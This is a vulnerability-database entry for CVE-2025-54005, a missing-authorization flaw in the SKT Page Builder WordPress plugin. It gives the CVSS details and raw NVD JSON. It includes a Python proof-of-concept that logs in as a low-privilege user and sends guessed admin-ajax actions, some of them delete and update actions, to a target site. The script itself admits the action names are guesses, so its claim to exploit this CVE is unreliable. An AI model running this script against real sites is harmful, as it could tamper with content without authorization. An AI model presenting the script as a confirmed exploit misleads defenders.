Security Vulnerability Report
中文
CVE-2025-54005 CVSS 4.3 MEDIUM

CVE-2025-54005

Published: 2025-12-16 09:15:52
Last Modified: 2026-04-27 16:16:29

Description

Missing Authorization vulnerability in sonalsinha21 SKT Page Builder skt-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SKT Page Builder: from n/a through <= 4.9.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SKT Page Builder <= 4.9 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54005 PoC - SKT Page Builder Broken Access Control # Author: Security Researcher # Target: WordPress with SKT Page Builder Plugin <= 4.9 import requests import sys def exploit_skt_builder(target_url, username, password): """ Exploits Missing Authorization vulnerability in SKT Page Builder Requires only low-privilege authenticated user account """ session = requests.Session() # Step 1: Login to WordPress with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f"[*] Logging in as {username}...") resp = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed!") return False print("[+] Login successful!") # Step 2: Exploit the broken access control # Identify vulnerable AJAX action - common pattern in SKT Page Builder ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Try common vulnerable actions (specific action depends on plugin version) vulnerable_actions = [ 'skt_builder_save_layout', 'skt_builder_export_config', 'skt_builder_import_template', 'skt_builder_delete_element', 'skt_builder_update_options' ] print("[*] Testing vulnerable AJAX actions...") for action in vulnerable_actions: exploit_data = { 'action': action, 'security': 'any_value', # Often missing nonce check # Additional parameters depend on specific vulnerability } try: resp = session.post(ajax_url, data=exploit_data, timeout=10) if resp.status_code == 200 and 'error' not in resp.text.lower(): print(f"[+] Action '{action}' may be vulnerable!") print(f"[+] Response: {resp.text[:200]}") except Exception as e: print(f"[-] Error testing {action}: {e}") return True if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve_2025_54005.py <target_url> <username> <password>") print("Example: python cve_2025_54005.py http://target.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_skt_builder(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54005", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:52.440", "lastModified": "2026-04-27T16:16:28.507", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in sonalsinha21 SKT Page Builder skt-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SKT Page Builder: from n/a through <= 4.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/skt-builder/vulnerability/wordpress-skt-page-builder-plugin-4-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}